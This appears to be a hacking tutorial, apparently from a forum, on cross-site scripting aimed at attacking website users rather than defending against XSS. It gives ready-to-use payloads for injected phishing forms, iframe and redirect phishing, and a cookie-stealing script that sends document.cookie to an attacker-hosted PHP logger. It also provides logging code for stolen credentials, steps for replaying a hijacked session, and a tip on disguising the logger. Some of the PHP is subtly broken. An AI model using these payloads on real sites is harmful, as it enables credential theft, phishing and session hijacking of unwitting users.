What is XSS ?
XSS or CSS stands for Cross Site Scripting which is believed to be the most common hacking technique. It's about injecting some malicious commands using the scripting languages to the website vulnerable areas, this makes the browser to just run the code without filtering the attackers input. This code can be phishing script or anything that could harm the users privacy.
How to use XSS technique?
To use this code you should insert this to search box or any vulnerable area of website that make this embedded to website coding so that iit can be executed at runtime. Here are some attack techniques you can do with a XSS flaw:
1.) Phishing script inject:
Just inject a 'user' and 'password' field in html with the <html> and <body> tags), that the victim may think he need
to login to the target site.
Here an example:
www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
content of phishingscript.php
<?php
login = $_POST['user'];
password = $_POST['Password'];
open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>
2.) Iframe Phishing:
Simple thing, just inject a javascript code containing an iframe where your phishing site is embeeded.
obviously it needs to look just like the target site.
Here an example:
www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>
(Note: height="100%" width="100%" means that the whole window is filled with that iframe.)
The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
difference and log in (If they're are foolish enough).
3.) Rediriction Phishing:
Also simple, just inject a javascript rediriction script that leads to your phishingsite, of course it needs to look just like the target site.
Here an example:
www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
or
www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">
4.) Cookie stealing:
One of the feared things in XSS flaws is the cookie stealing attack. In this method you need to place this cookiestealer.php in your hoster, and then inject a javascript with your cookie stealer script embedded on your target website.
content of cookiestealer.php (found it somewhere with google)
<?php
cookie = $HTTP_GET_VARS["cookie"];
file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>
Save it as cookiestealer.php and create a 'log.txt' and upload both files
on your own webspace, in the same directory and set "chmod 777".
Inject the following code in your target website:
http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>
Then the victim's cookie (target's website user who visited the url above) should
appear in the log.txt.
Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
and use it.
Obviously you need to replace
http://www.yourphishingsite.ru
With the url of your phishingsite.
PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
this looks less suspicous.